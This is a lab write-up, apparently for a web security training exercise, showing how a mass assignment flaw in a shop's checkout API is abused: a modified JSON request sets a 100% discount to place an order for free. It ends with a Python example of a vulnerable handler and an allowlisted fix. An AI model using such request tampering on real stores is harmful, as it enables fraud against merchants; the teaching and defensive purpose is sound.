Lab: Exploiting a mass assignment vulnerability

Preparation

  1. Open Burp Suite.
  2. Open the lab URL in Burp's proxy browser.
  3. Log in as wiener using the credentials wiener:peter.

Observe

  1. Go through the checkout flow, from "Add to cart" to "Place order".
  2. Read the HTTP history in Burp Proxy; we found these endpoints:
    1. GET /api/checkout HTTP/2: sent when opening the "Cart" page
    2. POST /api/checkout HTTP/2: sent when clicking "Place order"
    3. {host}/api/: API documentation page

Possible mass assignment of the product price

  1. The response to GET /api/checkout contains some interesting fields:
{
	"chosen_discount":{
		"percentage":0 // LEGIT
	},
	"chosen_products":[
		{
			"product_id":"1",
			"name":"Lightweight \"l33t\" Leather Jacket",
			"quantity":1,
			"item_price":133700 // LEGIT
		}
	]
}
  2. The field chosen_products.item_price looks legit; we might try setting item_price to 0 at checkout.
  3. Send the POST /api/checkout request to Burp Repeater and change the request body to:
{
	"chosen_products":[
		{
			"product_id":"1",
			"quantity":1,
			"item_price":0 // we add this field and set it to 0, to test whether the item price can be changed
		}
	]
}
  4. Send the request, but we still get the response INSUFFICIENT_FUNDS, so it looks like this didn't work:
HTTP/2 201 Created
Location: /cart?err=INSUFFICIENT_FUNDS
X-Frame-Options: SAMEORIGIN
Content-Length: 0
  5. We need to explore other parameter possibilities.

Solution

  1. Since the parameter chosen_products.item_price didn't work, we try to find other legitimate parameters.
  2. We found another legitimate parameter named chosen_discount.percentage; it looks like it is used to set the discount at checkout, and chosen_discount.percentage represents the percentage as an integer value.
  3. Send the POST /api/checkout request to Burp Repeater again and change the request body to:
{
	"chosen_discount":{
		"percentage":100 // to set a 100% discount
	},
	"chosen_products":[
		{
			"product_id":"1",
			"quantity":1
		}
	]
}
  4. We set chosen_discount.percentage to 100: since our store credit is $0, we want to "Place Order" with a 100% discount so that nothing needs to be paid.
  5. Click Send and we get a success response:
HTTP/2 201 Created
Location: /cart/order-confirmation?order-confirmed=true
X-Frame-Options: SAMEORIGIN
Content-Length: 0

Lab solved.
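The root cause above is that POST /api/checkout binds chosen_discount.percentage straight from the request body onto the order. The following is an added example, not the lab's or PortSwigger's code, showing that pattern beside an allowlisted handler that rejects any field the endpoint does not expect; the catalogue, store credit and server-side discount store are constructed, while the field names, the price and the Location values follow the lab's responses.

```python
# Added example, not the lab's or PortSwigger's code: a checkout handler that
# binds only an allowlist of request fields, so a client-supplied chosen_discount
# or item_price can never reach the order. Catalogue, credit and discount store
# are constructed; field names and Location values follow the lab's responses.

CATALOG = {"1": ("Lightweight \"l33t\" Leather Jacket", 133700)}  # price in cents
STORE_CREDIT = {"wiener": 0}
SERVER_DISCOUNT_PCT = {"wiener": 0}  # from server-side data, never from the body
ALLOWED_BODY_FIELDS = {"chosen_products"}
ALLOWED_ITEM_FIELDS = {"product_id", "quantity"}

class CheckoutError(ValueError):
    pass

def vulnerable_total(body, user):
    """Behaves like the lab: chosen_discount is bound straight from the body."""
    pct = body.get("chosen_discount", {}).get("percentage", SERVER_DISCOUNT_PCT[user])
    subtotal = sum(CATALOG[i["product_id"]][1] * i["quantity"]
                   for i in body.get("chosen_products", []))
    return subtotal * (100 - pct) // 100

def hardened_total(body, user):
    """Allowlisted binding: any key the endpoint does not expect is rejected."""
    extra = set(body) - ALLOWED_BODY_FIELDS
    if extra:
        raise CheckoutError(f"unexpected field(s): {sorted(extra)}")
    subtotal = 0
    for item in body.get("chosen_products", []):
        extra = set(item) - ALLOWED_ITEM_FIELDS
        if extra:
            raise CheckoutError(f"unexpected item field(s): {sorted(extra)}")
        if item.get("product_id") not in CATALOG:
            raise CheckoutError("unknown product")
        qty = item.get("quantity")
        if type(qty) is not int or qty < 1:
            raise CheckoutError("bad quantity")
        subtotal += CATALOG[item["product_id"]][1] * qty
    return subtotal * (100 - SERVER_DISCOUNT_PCT[user]) // 100

def place_order(body, user, total_fn=hardened_total):
    """Returns the Location value the lab shows for each outcome."""
    try:
        total = total_fn(body, user)
    except CheckoutError:
        return "/cart?err=BAD_REQUEST"  # constructed error code
    if total > STORE_CREDIT[user]:
        return "/cart?err=INSUFFICIENT_FUNDS"
    return "/cart/order-confirmation?order-confirmed=true"
```

Rejecting unexpected keys (rather than silently dropping them) also makes this kind of probing visible in the application logs.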